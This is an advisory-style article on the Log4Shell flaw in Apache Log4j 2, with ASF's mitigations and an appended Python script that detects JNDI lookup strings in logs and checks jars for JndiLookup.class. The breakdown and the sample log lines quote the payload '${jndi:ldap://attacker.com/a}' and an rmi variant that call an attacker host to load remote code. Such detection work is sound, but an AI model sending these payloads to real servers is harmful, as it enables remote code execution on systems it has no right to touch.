The vulnerability enables remote code execution on servers, including those operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other major service providers.
About the Vulnerability
A serious vulnerability has been found in Apache Log4j 2, an open-source Java logging package used by many programs; it can be exploited to achieve remote code execution on many servers.
The Apache Software Foundation (ASF) tracks the vulnerability as CVE-2021-44228; LunaSec has named it Log4Shell. ASF rates Log4Shell at the maximum severity score of 10 on the Common Vulnerability Scoring System (CVSS) scale.
How Log4Shell is exploited on vulnerable servers
LunaSec gives a step-by-step breakdown of how Log4Shell can be exploited on vulnerable servers:
- Data is sent from the user to the server (over any protocol).
- The server logs the data from the request, including the malicious string ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
- This string triggers the Log4j vulnerability, and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
- The response includes a path to a remote Java class file, which is injected into the server process.
- This injected payload triggers a second stage and allows the attacker to execute arbitrary code.
Researchers have already found evidence that Log4Shell can be exploited on servers run by Apple, Cloudflare, Twitter, Valve, Tencent, and other big companies. The vulnerability is also known to be trivially exploitable on Minecraft servers, with some proof-of-concept attacks using nothing more than the in-game chat.
Log4j version 2.15.0 has been released to address this problem, but The Record notes that the fix only changes a setting's default from “false” to “true”. Users who switch the setting back to “false” remain vulnerable. Fortunately, this also means that servers running older versions of Log4j can mitigate the attack by changing that setting.
Opinion of ASF and other bodies
For older versions of Log4j, if users cannot update to version 2.15.0, ASF says that “this behavior can be mitigated by setting system property ‘log4j2.formatMsgNoLookups’ to ‘true’ or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class)”.
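As an added example (not code from the article, LunaSec or ASF), the Python script below does two defender-side checks tied to the text above: it scans request-log lines for the ${jndi:...} lookup string from the step-by-step breakdown and reports the callback host, and it checks whether a jar still contains the JndiLookup class that ASF's zip command removes. The log lines and the stand-in jar are constructed here for the demonstration and are not real Log4j artifacts.

```python
import io
import re
import zipfile

# Lookup string from the breakdown above, matched case-insensitively so trivial
# case changes do not slip past; captures the JNDI scheme and callback host.
JNDI_RE = re.compile(r"\$\{\s*jndi:(?P<scheme>[a-z]+)://(?P<host>[^/\s}:]+)", re.I)

# Constructed sample access-log lines (not from the article). Line 2 carries the
# payload quoted above in the User-Agent field; line 3 a variant in the query.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${JNDI:rmi://attacker.com:1099/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

def find_jndi_lookups(lines):
    """One dict per line holding a JNDI lookup: line number, scheme, host, text."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_RE.search(line)
        if match:
            hits.append({"line": number, "scheme": match.group("scheme").lower(),
                         "host": match.group("host"), "raw": match.group(0)})
    return hits

# Class that ASF's zip command deletes; if it is still present, that mitigation
# has not been applied to this jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def jar_has_jndi_lookup(jar):
    """True if the jar (a path or raw bytes) still contains JndiLookup.class."""
    src = io.BytesIO(jar) if isinstance(jar, bytes) else jar
    with zipfile.ZipFile(src) as zf:
        return JNDI_CLASS in zf.namelist()

def make_constructed_jar(include_jndi):
    """Build a tiny stand-in jar (constructed; not a real Log4j build) for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"placeholder entry, not real bytecode")
    return buf.getvalue()

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['host']}")
    print("JndiLookup removed:", not jar_has_jndi_lookup(make_constructed_jar(True)))
```

Pointing jar_has_jndi_lookup at a real log4j-core jar path verifies whether the class-removal mitigation has actually been applied.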
The Computer Emergency Response Team (CERT) for New Zealand, Deutsche Telekom’s CERT, the security firm GreyNoise, and others have all reported that attackers are actively scanning for servers vulnerable to Log4Shell. These attempts will continue and grow, so addressing the vulnerability sooner rather than later is important.